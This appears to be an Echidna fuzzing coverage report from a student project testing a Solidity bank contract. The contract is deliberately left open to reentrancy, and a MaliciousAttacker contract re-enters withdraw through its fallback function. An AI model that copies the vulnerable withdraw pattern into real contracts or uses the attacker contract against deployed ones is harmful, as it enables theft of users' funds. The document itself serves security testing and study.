/home/ali/TFG/pruebas-echidna/contracts/VulnerableBank.sol
  1 |     | // SPDX-License-Identifier: MIT
  2 |     | pragma solidity ^0.8.0;
  3 |     | 
  4 | *   | contract VulnerableBank {
  5 |     |     mapping(address => uint256) public balances;
  6 |     | 
  7 | *   |     function deposit() public payable {
  8 | *   |         balances[msg.sender] += msg.value;
  9 |     |     }
 10 |     | 
 11 | *   |     function withdraw() public {
 12 | *   |         uint256 bal = balances[msg.sender];
 13 | *   |         require(bal > 0);
 14 |     | 
 15 |     |         // Vulnerabilidad: Llamada externa antes de actualizar estado
 16 | *   |         (bool sent, ) = msg.sender.call{value: bal}("");
 17 | *   |         require(sent, "Failed to send Ether");
 18 |     | 
 19 | *   |         balances[msg.sender] = 0;
 20 |     |     }
 21 |     | }

/home/ali/TFG/pruebas-echidna/echidna/ReentrancyEchidnaTest.sol
  1 |     | // SPDX-License-Identifier: MIT
  2 |     | pragma solidity ^0.8.13;
  3 |     | 
  4 |     | import "../contracts/VulnerableBank.sol";
  5 |     | 
  6 |     | contract MaliciousAttacker {
  7 |     |     VulnerableBank target;
  8 |     |     bool isReentering;
  9 |     | 
 10 | *   |     constructor(VulnerableBank _target) {
 11 | *   |         target = _target;
 12 |     |     }
 13 |     | 
 14 |     |     // El "motor" de la reentrada
 15 |     |     fallback() external payable {
 16 | *   |         if (address(target).balance >= msg.value && !isReentering) {
 17 | *   |             isReentering = true;
 18 | *r  |             target.withdraw(); // <--- AQUÍ se produce la reentrada
 19 |     |         }
 20 |     |     }
 21 |     | 
 22 | *   |     function attack() public payable {
 23 | *   |         target.deposit{value: msg.value}();
 24 | *r  |         target.withdraw();
 25 |     |     }
 26 |     | }
 27 |     | 
 28 | *   | contract ReentrancyEchidnaTest is MaliciousAttacker{
 29 |     |     VulnerableBank vault;
 30 |     | 
 31 |     |     // Pasamos el vault al constructor de MaliciousAttacker
 32 | *   |     constructor() MaliciousAttacker(new VulnerableBank()) payable {
 33 | *   |         vault = target; // 'target' viene de MaliciousAttacker
 34 |     |     }
 35 |     | 
 36 |     |     function echidna_test_vault_empty() public view returns (bool) {
 37 |     |         return address(vault).balance >= 0; 
 38 |     |     }
 39 |     | 
 40 |     |     function echidna_no_ghost_balance() public view returns (bool) {
 41 |     |         if (address(vault).balance == 0) {
 42 |     |             return vault.balances(address(this)) == 0;
 43 |     |         }
 44 |     |         return true;
 45 |     |     }
 46 |     | }

